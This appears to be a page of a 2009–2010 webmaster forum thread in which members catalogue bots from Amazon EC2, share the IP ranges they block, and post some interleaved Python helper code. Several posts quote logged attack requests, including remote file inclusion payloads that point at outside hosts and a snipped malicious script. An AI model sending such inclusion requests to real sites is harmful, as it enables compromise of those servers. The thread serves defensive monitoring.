Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

This 278-message thread spans 10 pages; this is page 4.
amazonaws.com plays host to a wide variety of bad bots
Most recently seen: Gnomit
Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 3:04 am on Jan 18, 2009 (gmt 0)

ec2-67-202-57-30.compute-1.amazonaws.com
Mozilla/5.0 (compatible; X11; U; Linux i686 (x86_64); en-US; +http://gnomit.com/) Gecko/2008092416 Gnomit/1.0"

- robots.txt? NO
- Unbalanced quotation mark in UA (closing only)
- site in UA yields this oh-so-descriptive info:

<html>
<head>
</head>
<body>
</body>
</html>

----- ----- ----- ----- -----
FWIW, bona fide amazonaws.com hosts spewed at least 33 bots on two of my sites in recent months. (Does someone get paid per bot or something?) Some bots may be new to some of you, or newly renamed. Here are the actual UA strings, in no particular order:

NetSeer/Nutch-0.9 (NetSeer Crawler; [netseer.com;...] crawler@netseer.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
[Note ru.]
robots.txt? NO

feedfinder/1.371 Python-urllib/1.16 +http://www.aaronsw.com/2002/feedfinder/
robots.txt? NO

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
robots.txt? NO

Twitturly / v0.5
robots.txt? NO

YebolBot (compatible; Mozilla/5.0; MSIE 7.0; Windows NT 6.0; rv:1.8.1.11; mailTo:thunder.chang@gmail.com)
robots.txt? NO

YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)
[Whattaya think robots.txt is for, huh?]
robots.txt? YES ... Four times in 45 minutes

Attributor/Dejan-1.0-dev (Test crawler; [attributor.com;...] info at attributor com)
robots.txt? NO

PRCrawler/Nutch-0.9 (data mining development project)
robots.txt? YES

EnaBot/1.2 (http://www.enaball.com/crawler.html)
robots.txt? YES

Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html) )
[Note spaced-out closing parens]
robots.txt? YES

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09
robots.txt? NO

TheRarestParser/0.2a (http://therarestwords.com/)
robots.txt? NO

Mozilla/5.0 (compatible; D1GArabicEngine/1.0; crawlmaster@d1g.com)
robots.txt? NO

Clustera Crawler/Nutch-1.0-dev (Clustera Crawler; [crawler.clustera.com;...] cluster@clustera.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
robots.txt? YES

yacybot (i386 Linux 2.6.16-xenU; java 1.6.0_02; America/en) [yacy.net...]
robots.txt? NO

Mozilla/5.0
robots.txt? NO

Spock Crawler (http://www.spock.com/crawler)
robots.txt? YES

TinEye
robots.txt? NO

Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; [netseer.com...] crawler@netseer.com)
robots.txt? YES

nnn/ttt (n)
robots.txt? YES

AideRSS/1.0 (aiderss.com)
robots.txt? NO

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
robots.txt? NO

----- ----- ----- ----- -----
These two UAs alternated multiple times one afternoon:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
robots.txt? NO

WebClient
robots.txt? YES

----- ----- ----- ----- -----
And finally, way too many offerings from "Paul," who's apparently unable to make up his mind, UA name-wise:

Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com
robots.txt? NO

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)
robots.txt? YES

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

-----
Slippery little suckers indeed. Thank goodness I block amazonaws.com no matter what.

 

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 7:31 pm on Nov 17, 2009 (gmt 0)

Many, many AWS-based UAs still hitting home and specific pages. robots.txt? NEVER.

DAILY (multiple times; always HEAD requests):

ec2-75-101-197-164.compute-1.amazonaws.com
PycURL/7.18.2

ec2-174-129-141-109.compute-1.amazonaws.com
PostRank/2.0 (postrank.com)

WEEKLY (approx.; always HEAD requests):

ec2-174-129-91-231.compute-1.amazonaws.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

(Two days earlier, Netcraft sent its minion...)

lager.netcraft.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

dstiles

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 5+ Year Member



 
Msg#: 3828718 posted 10:20 pm on Nov 17, 2009 (gmt 0)

I just dumped the whole 174.129.nnn.nnn block into IIS's Security Deny list - won't ever see it again even in the logs. A /24 of a persistent 75.101 block followed it in and is likely to be extended any day now...

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 11:38 pm on Nov 17, 2009 (gmt 0)

One more for your files, dstiles :)

I forgot to mention this many, many, many-times-a-day pest. No robots.txt, natch. GETs, not HEADs:

ec2-67-202-15-174.compute-1.amazonaws.com
Python-urllib/2.6

dstiles

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 5+ Year Member



 
Msg#: 3828718 posted 12:06 am on Nov 18, 2009 (gmt 0)

Only got one hit near that this month (176, not 174) but lots more in the 67.202.nnn.nnn range. Their days may be numbered but I'm interested in seeing what else comes along. :)

I already have all known (to me) AWS blocks blocked with hits logged, including 67.202.0.0 - 67.202.127.255. It's when the hits cloud other logged issues that I react violently. :)
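A range block like the ones described above can be sketched in Python with the standard `ipaddress` module. This is only an illustration: the list holds just the two ranges named so far in this thread (it is not a complete map of AWS address space), and `BLOCKED_NETWORKS` and `is_blocked` are hypothetical names, not anyone's actual server configuration.

```python
import ipaddress

# Ranges named in this thread only; NOT a complete list of AWS addresses.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("67.202.0.0/17"),   # 67.202.0.0 - 67.202.127.255
    ipaddress.ip_network("174.129.0.0/16"),  # 174.129.0.0 - 174.129.255.255
]


def is_blocked(ip: str) -> bool:
    """Return True if the address falls inside any listed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_NETWORKS)


if __name__ == "__main__":
    for ip in ("67.202.15.174", "174.129.141.109", "75.101.197.164"):
        print(ip, "blocked" if is_blocked(ip) else "not listed")
```

Addresses outside the listed ranges (the 75.101 hits, for example) pass through until their blocks are added, which is the maintenance cost of blocking by range rather than by host name.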

Bewenched

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 6:40 pm on Nov 19, 2009 (gmt 0)

Yup... had to just block ALL of 174.129.x.x

MASSIVE numbers of form submits, like 600 in less than one minute.

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 8:01 pm on Nov 19, 2009 (gmt 0)

Amazon's Elastic Compute Cloud (EC2)/AWS hosting gets bigger and biggger and bigggger:

174.129.0.0 - 174.129.255.255
174.129.0.0/16
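For anyone converting a first-to-last address range into CIDR notation like the pair above, Python's standard `ipaddress.summarize_address_range` does the arithmetic. A minimal sketch; `range_to_cidrs` is a hypothetical helper name.

```python
import ipaddress
from typing import List


def range_to_cidrs(first: str, last: str) -> List[str]:
    """Collapse an inclusive IPv4 range into the fewest CIDR blocks."""
    networks = ipaddress.summarize_address_range(
        ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
    )
    return [str(net) for net in networks]


if __name__ == "__main__":
    print(range_to_cidrs("174.129.0.0", "174.129.255.255"))  # ['174.129.0.0/16']
    print(range_to_cidrs("67.202.0.0", "67.202.127.255"))    # ['67.202.0.0/17']
```

A range that does not align to a power-of-two boundary comes back as several blocks instead of one.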

@Bewenched: Yikes. Were you attacked by a single IP/amazonaws.com Host? If yes, which one, please? Also, was there one particular UA? TIA

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:51 pm on Nov 19, 2009 (gmt 0)

ec2-174-129-75-209.compute-1.amazonaws.com
SheenBot/SheenBot-1.0.0 (Sheen web crawler)

robots.txt? Yes

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 11:00 pm on Nov 19, 2009 (gmt 0)

Two UAs crawling Tweeted URLs:

ec2-174-129-62-166.compute-1.amazonaws.com
Typhoeus - http://github.com/pauldix/typhoeus/tree/master

robots.txt? NO

ec2-75-101-227-191.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.1

robots.txt? NO

keyplyr

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 10+ Year Member, Top Contributors Of The Month



 
Msg#: 3828718 posted 9:11 am on Nov 21, 2009 (gmt 0)

ec2-174-129-225-12.compute-1.amazonaws.com
UA: Who.is Bot
robots.txt: no

hit / and ran

tangor

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 5+ Year Member, Top Contributors Of The Month



 
Msg#: 3828718 posted 9:46 am on Nov 21, 2009 (gmt 0)

I'm this close to Deny 174.129* that I have to ask (and I ask because this topic thrills me, but I have little to zero ambition to learn it fully): are there ANY legit visitors from this domain? So far I've seen none. I lean toward whitelisting (less work) rather than expending oodles of time on pissant denies, because the latter is SO much more work!

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:09 pm on Nov 21, 2009 (gmt 0)

I block by Host (amazonaws) and I've yet to see a single real-person-in-real-time hit from AWS since before I began this thread on Jan. 17, 2009. Rapid-fire assaults increase every week, like this 90-second blitz from a few days ago (partial listing):

[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)

That range, that place, gives irresponsible bot-runners a place to hide and breed.
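A blitz like the one listed above is easier to size up once the denied hits are tallied per client. The sketch below assumes error-log lines shaped like the abbreviated excerpt in this post, with a `[client IP]` field (an optional `:port` suffix is tolerated); `count_denied` and `SAMPLE_LOG` are hypothetical names.

```python
import re
from collections import Counter

# Matches "[client 1.2.3.4]" and, as an assumption, "[client 1.2.3.4:5678]".
CLIENT_RE = re.compile(r"\[client (\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?\]")


def count_denied(lines):
    """Count 'client denied' entries per client IP."""
    counts = Counter()
    for line in lines:
        if "client denied by server configuration" not in line:
            continue
        match = CLIENT_RE.search(line)
        if match:
            counts[match.group(1)] += 1
    return counts


# The ten lines from the partial listing above.
SAMPLE_LOG = """\
[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)
"""

if __name__ == "__main__":
    for ip, hits in count_denied(SAMPLE_LOG.splitlines()).most_common():
        print(f"{hits:3d}  {ip}")
```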

keyplyr

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 10+ Year Member, Top Contributors Of The Month



 
Msg#: 3828718 posted 11:21 pm on Nov 21, 2009 (gmt 0)

What range does Amazon's A9 search engine crawl from?

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 8:39 am on Nov 22, 2009 (gmt 0)

Good Q. Beats me. Never spotted an A9 hit -- anyone? Then again, it appears A9 is primarily product-oriented now and none of my sites sell stuff. Rather, the majority of my hits from AWS are social network-related.

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 5:23 pm on Nov 22, 2009 (gmt 0)

Alas, even Amazon EC2 (Amazon Elastic Compute Cloud) isn't free of exploit-probers:

ec2-67-202-25-2.compute-1.amazonaws.com
Toata dragostea mea pentru diavola

11/22 07:59:29 /1.1
11/22 07:59:29 /install.txt
11/22 07:59:29 /
11/22 07:59:30 /cart/
11/22 07:59:30 /zencart/
11/22 07:59:30 /zen-cart/
11/22 07:59:30 /zen/
11/22 07:59:30 /shop/

Here's info [webmasterworld.com] about the primary 'toata' UA. (There are variations.) As a Romanian-speaking pal of GaryK's translated here [webmasterworld.com], it means: "I love the devil."
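The probe above has a recognizable shape: one host asking for many different paths inside a second or two. A rough Python sketch of flagging that pattern follows. The thresholds (`min_paths=5`, a 5-second window) and the names `find_probe_bursts` and `parse_stamp` are illustrative assumptions, and the year is taken from the post date.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def find_probe_bursts(hits, min_paths=5, window=timedelta(seconds=5)):
    """hits: iterable of (host, datetime, path) tuples.

    Return the set of hosts that requested at least `min_paths`
    distinct paths within any span of `window`.
    """
    by_host = defaultdict(list)
    for host, stamp, path in hits:
        by_host[host].append((stamp, path))

    flagged = set()
    for host, entries in by_host.items():
        entries.sort()
        start = 0
        for end in range(len(entries)):
            # Slide the window start forward until it spans <= window.
            while entries[end][0] - entries[start][0] > window:
                start += 1
            distinct = {path for _, path in entries[start:end + 1]}
            if len(distinct) >= min_paths:
                flagged.add(host)
                break
    return flagged


def parse_stamp(text, year=2009):
    """Parse the 'MM/DD HH:MM:SS' stamps used in the listing above."""
    return datetime.strptime(f"{year}/{text}", "%Y/%m/%d %H:%M:%S")


PROBER = "ec2-67-202-25-2.compute-1.amazonaws.com"
SAMPLE_HITS = [
    (PROBER, parse_stamp("11/22 07:59:29"), "/1.1"),
    (PROBER, parse_stamp("11/22 07:59:29"), "/install.txt"),
    (PROBER, parse_stamp("11/22 07:59:29"), "/"),
    (PROBER, parse_stamp("11/22 07:59:30"), "/cart/"),
    (PROBER, parse_stamp("11/22 07:59:30"), "/zencart/"),
    (PROBER, parse_stamp("11/22 07:59:30"), "/zen-cart/"),
    (PROBER, parse_stamp("11/22 07:59:30"), "/zen/"),
    (PROBER, parse_stamp("11/22 07:59:30"), "/shop/"),
]

if __name__ == "__main__":
    print(find_probe_bursts(SAMPLE_HITS))
```

A browser loading a page with many assets can trip the same rule, so the thresholds would need tuning against real traffic before being used to block anything.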

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 4:57 am on Nov 24, 2009 (gmt 0)

Yikes. Another exploit this evening:

ec2-67-202-60-246.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.0

//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

At least AWS has recommendations/info [aws.amazon.com] for reporting abuse. Wonder if bad bots qualify as report-worthy, too? ;)

---
P.S./FYI

The following hosts/UAs just requested the exact same 'file' -- the URIs match even down to the exact same clientid and site referenced -- within the same 20-minute period. Googlebot, which was the only one to request robots.txt, was also the only one to attempt the hit twice (1 min. apart):

icerocket.com
BlogSearch/1.0 +http://www.icerocket.com/

87.218.210-nn.q9.net
Java/1.6.0_14

crawl-66-249-71-107.googlebot.com
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

64.94.67.nnn
Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)

Who's crawling/exploiting whom?

keyplyr

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 10+ Year Member, Top Contributors Of The Month



 
Msg#: 3828718 posted 8:59 am on Nov 24, 2009 (gmt 0)

//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

There's a lot of that coming from various hosts.

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:01 am on Dec 1, 2009 (gmt 0)

ec2-67-202-41-144.compute-1.amazonaws.com
cierzo/Nutch-0.9

robots.txt? Yes

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:33 pm on Dec 3, 2009 (gmt 0)

ec2-75-101-232-27.compute-1.amazonaws.com
MetaURI API +metauri.com

robots.txt? NO

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 1:09 am on Dec 4, 2009 (gmt 0)

ec2-75-101-158-138.compute-1.amazonaws.com
my6sense/1.0

robots.txt? NO

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 2:49 am on Dec 7, 2009 (gmt 0)

Emphasis mine. Running from amazonaws, this is a bot. But it's also a FF add-on, which means, if it alters all FF strings, it'll be iffy distinguishing potential hits from less obvious/notorious server farms.

ec2-75-101-196-241.compute-1.amazonaws.com
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (MrTweet/1.0)

robots.txt? NO

dstiles

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 5+ Year Member



 
Msg#: 3828718 posted 8:10 pm on Dec 9, 2009 (gmt 0)

Just to add another reason to block the cloud:

"Zeus crimeware using Amazon's EC2 as command and control server"
(from zdnet security blog)

A few days ago I noted in another thread that I'd seen an AWS IP in the midst of botnet accesses.

keyplyr

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 10+ Year Member, Top Contributors Of The Month



 
Msg#: 3828718 posted 2:00 am on Dec 21, 2009 (gmt 0)

...an AWS IP in the midst of botnet accesses.

In the "midst?" Ha, I looked up "botnet" and expected to see a thumbnail of Amazon EC2:

174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
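To see how hits like these spread across address blocks, the client IP at the start of each access-log line can be bucketed by its /16. A small sketch, assuming IPv4 clients and the log layout shown above; `hits_per_slash16` and `SAMPLE_LINES` are hypothetical names.

```python
import ipaddress
from collections import Counter


def hits_per_slash16(lines):
    """Count access-log lines per IPv4 /16, keyed by CIDR string."""
    counts = Counter()
    for line in lines:
        fields = line.split()
        if not fields:
            continue
        try:
            # strict=False masks the host bits: 67.202.31.110 -> 67.202.0.0/16
            net = ipaddress.IPv4Network(fields[0] + "/16", strict=False)
        except ValueError:
            continue  # first field was not an IPv4 address
        counts[str(net)] += 1
    return counts


# Client IPs from the eight favicon.ico requests above (rest of line shortened).
SAMPLE_LINES = [
    '174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"',
    '75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"',
    '67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"',
    '67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"',
    '67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"',
    '67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"',
    '75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"',
    '174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"',
]

if __name__ == "__main__":
    for net, hits in hits_per_slash16(SAMPLE_LINES).most_common():
        print(f"{hits:3d}  {net}")
```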

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 5:36 pm on Dec 22, 2009 (gmt 0)

ec2-174-129-64-134.compute-1.amazonaws.com
Mozilla/5.0 (compatible; XmarksFetch/1.0; +http://www.xmarks.com/about/crawler; info@xmarks.com)

robots.txt? Yes

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 6:14 pm on Dec 22, 2009 (gmt 0)

Speaking of AWS/EC2 and botnet-related exploits... Three seconds apart:

.
Mozilla/5.0
22:36:04///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

ec2-204-236-129-29.us-west-1.compute.amazonaws.com
Mozilla/5.0
22:36:07///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

Notes:

- The first hit's dot-as-host IP turned out to be 99.198.118.18*, a Chicago-based server farm. Search results show the same IP and exploit hitting elsewhere.

- The intra-URI exploit domain obfuscated in both hits as 'example.com' has approx. 2,150 search results. Its page title? "Verified by Visa" (and content includes "Start by entering your Visa card below...").

- If you're blocking on amazonaws.com subdomain formats, the second hit is slightly different. Typically, they're --

IP.compute-1(or2,etc).amazonaws.com

-- but this is:

IP.us-west-1.compute.amazonaws.com

There are more variations here [robtex.com]. (I block on amazonaws.com)
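The difference between matching one subdomain format and matching the whole domain can be shown in a few lines of Python. The narrow pattern below is an assumption about what a format-specific rule might look like; `is_aws_host` is a hypothetical helper that tests only the domain suffix.

```python
import re

# A format-specific rule: only catches "ec2-a-b-c-d.compute-N.amazonaws.com".
NARROW_RE = re.compile(r"^ec2-\d+-\d+-\d+-\d+\.compute-\d+\.amazonaws\.com$")


def is_aws_host(hostname: str) -> bool:
    """True for amazonaws.com itself or any name beneath it."""
    host = hostname.rstrip(".").lower()
    return host == "amazonaws.com" or host.endswith(".amazonaws.com")


if __name__ == "__main__":
    hosts = [
        "ec2-75-101-138-216.compute-1.amazonaws.com",
        "ec2-204-236-129-29.us-west-1.compute.amazonaws.com",
        "lager.netcraft.com",
    ]
    for host in hosts:
        print(host, bool(NARROW_RE.match(host)), is_aws_host(host))
```

The us-west-1 name slips past the narrow pattern but not the suffix test. Either way the host name comes from reverse DNS, which the address owner controls, so the result is only as trustworthy as that lookup.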

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 8:24 pm on Dec 22, 2009 (gmt 0)

Whoa. Another one. Wonder when AWS/EC2 is going to clean up its act?

ec2-75-101-138-216.compute-1.amazonaws.com
Mozilla/5.0
10:47:33 //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?

Note: .su is the country-code domain originally assigned to the Soviet Union.

(FWIW, I won't keep posting exploit events because this thread's for spider sightings and the fake UA has been reported.)
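The exploit requests quoted in this thread all pass a remote URL as a parameter value, once with literal brackets and once percent-encoded. A hedged Python sketch of spotting that shape: `looks_like_rfi` and the regex are illustrative assumptions, and the check will also flag legitimate parameters that carry a URL (redirect targets, for example).

```python
import re
from urllib.parse import unquote

# A query parameter whose value begins with a URL scheme.
RFI_RE = re.compile(r"[?&][^=&]*=(?:https?|ftp)://", re.IGNORECASE)


def looks_like_rfi(request_uri: str) -> bool:
    """Decode percent-escapes once, then look for 'param=http://...'."""
    return bool(RFI_RE.search(unquote(request_uri)))


if __name__ == "__main__":
    samples = [
        "///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?",
        "//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?",
        "/page?id=5",
    ]
    for uri in samples:
        print(looks_like_rfi(uri), uri)
```

Decoding before matching is what lets one rule cover both the bracketed and the %5B/%5D forms.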

dstiles

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 5+ Year Member



 
Msg#: 3828718 posted 3:46 pm on Jan 1, 2010 (gmt 0)

Just found a new (to me) Amazon IP block. Cloud but not labelled AWS.

IP: 204.236.128.0 - 204.236.255.255
UA: Chen Li/Nutch-1.0 (Nutch spiderman; [chenli....] com. cn; chenlibiti @163. com)
Robots: No idea.

Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 4:59 pm on Jan 1, 2010 (gmt 0)

Good spotting, dstiles! Shoot. Cloaked servers now, too -- and w/ a UA related to China via .cn and 163.com, hosts with long histories of nastiness on my sites. In a word: Ugh.

FWIW, here's yet another UA:

ec2-174-129-141-135.compute-1.amazonaws.com
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

robots.txt? NO

dstiles

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 5+ Year Member



 
Msg#: 3828718 posted 11:12 pm on Jan 1, 2010 (gmt 0)

Already got the whole range 174.129.0.0 - 174.129.255.255 blocked! :)

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:05 am on Jan 12, 2010 (gmt 0)

No UA at all this time, and only went for favicon.ico:

ec2-75-101-169-108.compute-1.amazonaws.com
-

robots.txt? NO

tangor

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 5+ Year Member, Top Contributors Of The Month



 
Msg#: 3828718 posted 10:50 am on Jan 12, 2010 (gmt 0)

Pfui...

This has been a very interesting thread... what say you parse it for significance and reduce it to the full skinny? For the kiddies out there yet to ask the query?

More fun: provide IP ranges à la amazonaws.com

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 4:08 am on Jan 16, 2010 (gmt 0)

Long story short? Block .amazonaws.com :)

IP range-wise, the IPs are 'in' the Host names.* Now as to how many there are, let alone what they are, I'm sorry but I'll have to leave that compilation as a sweat equity exercise for the bot-curious/obsessed at this time. Suffice it to say that akin to any country -- and numbering more than many countries'! -- Amazon's cloud-related IPs are neither contiguous nor non-expanding.

.
*The second post in the MetaURI [webmasterworld.com] thread shows more detail, including an atypical example of the same UA using the exact same AWS IP over a period of time.
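Since the IPs are 'in' the host names, they can be pulled back out mechanically. A minimal Python sketch, assuming the `ec2-a-b-c-d.` prefix seen in every EC2 host name quoted in this thread; `ip_from_ec2_host` is a hypothetical helper name.

```python
import ipaddress
import re
from typing import Optional

# Leading "ec2-a-b-c-d." label, as in the host names quoted in this thread.
EC2_HOST_RE = re.compile(r"^ec2-(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})\.")


def ip_from_ec2_host(hostname: str) -> Optional[ipaddress.IPv4Address]:
    """Return the IPv4 address embedded in an EC2 host name, else None."""
    host = hostname.rstrip(".").lower()
    if not host.endswith(".amazonaws.com"):
        return None
    match = EC2_HOST_RE.match(host)
    if not match:
        return None
    try:
        return ipaddress.IPv4Address(".".join(match.groups()))
    except ipaddress.AddressValueError:
        return None  # e.g. an octet above 255


if __name__ == "__main__":
    for name in (
        "ec2-67-202-57-30.compute-1.amazonaws.com",
        "ec2-204-236-129-29.us-west-1.compute.amazonaws.com",
        "lager.netcraft.com",
    ):
        print(name, "->", ip_from_ec2_host(name))
```

Running this over a log's host column and collecting the results is one way to start the range compilation described above.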

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved